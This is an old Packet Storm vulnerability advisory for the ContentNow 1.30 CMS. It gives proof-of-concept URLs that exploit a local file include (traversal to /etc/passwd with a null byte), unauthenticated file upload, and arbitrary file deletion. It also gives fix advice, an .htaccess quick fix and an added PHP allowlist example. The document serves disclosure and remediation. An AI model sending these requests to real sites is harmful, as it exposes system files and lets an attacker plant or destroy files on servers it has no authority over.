contentnow-130.txt

14 Nov 2006 00:00:00 | Reported by r0ut3r | Type: packetstorm | Source: packetstormsecurity.com

ContentNow 1.30 Local File Include & Arbitrary File Upload/Delete Vulnerabilities, Vendor: contentnow.mf4k.de, Discovered By: r0ut3r, Criticality: Highly critical, Local file inclusion, File Upload/Command Execution, File Removal Vulnerability, Fix with authentication, Quick Fix with .htacces

Code
`#####################################################################################  
# #  
# r0ut3r Presents... #  
# #  
# Another r0ut3r discovery! #  
# #  
# ContentNow 1.30 Local File Include & Arbitrary File Upload/Delete Vulnerabilities #  
# #  
#####################################################################################  
# #  
# Software: ContentNow 1.30 Vulnerabilities #  
# #  
# Vendor: http://www.contentnow.mf4k.de/ #  
# #  
# Released: 2006/11/13 #  
# #  
# Discovered By: r0ut3r (writ3r [at] gmail.com) #  
# #  
# Criticality: Highly critical #  
# #  
#####################################################################################  
  
Local file inclusion vulnerability  
------------------------------------  
  
Vuln code:  
----------  
// get/set language  
$setLang= (empty ($_GET['lang'])) ? $cnCore->getBackendLanguage() : $_GET['lang'];  
  
// define language  
include_once ('./language/'.$setLang.'.language.php');  
$lang= $cnLanguageArray[$setLang];  
  
Exploit:  
--------  
http://localhost/cn/edit.php?lang=../../../../etc/passwd%00  
http://localhost/cn/image.php?lang=../../../../etc/passwd%00  
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00  
Probably more, never checked all files.  
  
File Upload/Command Execution Vulnerability:  
---------------------------------------------  
Note: They tell you to set 777 permissions on install for certain folders.  
  
http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en  
Set path to the directory location:  
/ = root path  
  
Select file, then upload it.  
  
File Removal Vulnerability:  
----------------------------  
To delete files:  
http://localhost/contentnow_130/cn/upload.php?path=/&cid=&type=file&folder=&lang=en&delfile=q.php&single=false  
Set path to the directory location:  
/ = root path  
Set delfile to the file you want to delete:  
q.php  
  
More Information:  
-----------------  
Email: writ3r [at] gmail.com  
  
Fix:  
-----  
How about some authentication?!  
Only allow the upload of certain file types, depending on what you want to use it for.  
  
As for the local file includes, work out a better way to set languages, i.e. make sure the language file included is one required by the CMS.  
  
Quick Fix:  
----------  
Set up .htaccess on cn/  
  
Example Fix:  
------------  
.htaccess:  
AuthName "ContentNow Fix!"  
AuthType Basic  
AuthUserFile /var/www/html/cn/.htpasswd  
Require valid-user  
  
This will prevent anyone from accessing this folder; this would be a solution for administrators while an upgrade or patch is created.  
If you do want to access it, you had better make a .htpasswd file too.  
  
  
`
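
One way to implement the advisory's suggested fix for the local file include, as an added example that is not ContentNow's code or the advisory author's: the requested language is accepted only if it matches a language file that actually exists. The function names, the temporary demo directory and the `en`/`de` sample files are assumptions made for illustration.

```php
<?php
// Added example (not ContentNow's code): allowlist-based language selection.

/** Language codes that have a "<code>.language.php" file in $langDir. */
function availableLanguages(string $langDir): array
{
    $codes = [];
    foreach (glob($langDir . '/*.language.php') ?: [] as $file) {
        $codes[] = basename($file, '.language.php');
    }
    return $codes;
}

/** Return $requested only if it is an installed language, else $default. */
function resolveLanguage($requested, string $default, array $allowed): string
{
    // Non-strings (e.g. ?lang[]=x) never reach the comparison.
    if (!is_string($requested)) {
        return $default;
    }
    // Strict comparison against the directory listing: separators, "..",
    // and NUL bytes cannot match an installed code.
    return in_array($requested, $allowed, true) ? $requested : $default;
}

// Constructed demo: a temporary language directory with two language files.
$langDir = sys_get_temp_dir() . '/cn_lang_demo_' . getmypid();
@mkdir($langDir);
foreach (['en', 'de'] as $code) {
    file_put_contents("$langDir/$code.language.php",
        "<?php \$cnLanguageArray['$code'] = ['hello' => '$code'];");
}
$allowed = availableLanguages($langDir);
$default = 'en'; // stands in for $cnCore->getBackendLanguage()

// Constructed request values, including the advisory's traversal string.
$samples = ['de', '../../../../etc/passwd' . "\0", ['x'], ''];
foreach ($samples as $requested) {
    $setLang = resolveLanguage($requested, $default, $allowed);
    include_once "$langDir/$setLang.language.php";
    printf("%-32s -> %s\n", json_encode($requested), $setLang);
}
array_map('unlink', glob("$langDir/*"));
rmdir($langDir);
```

In the application itself, the two functions would replace the ternary on `$_GET['lang']`, with `$cnCore->getBackendLanguage()` passed as the default.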
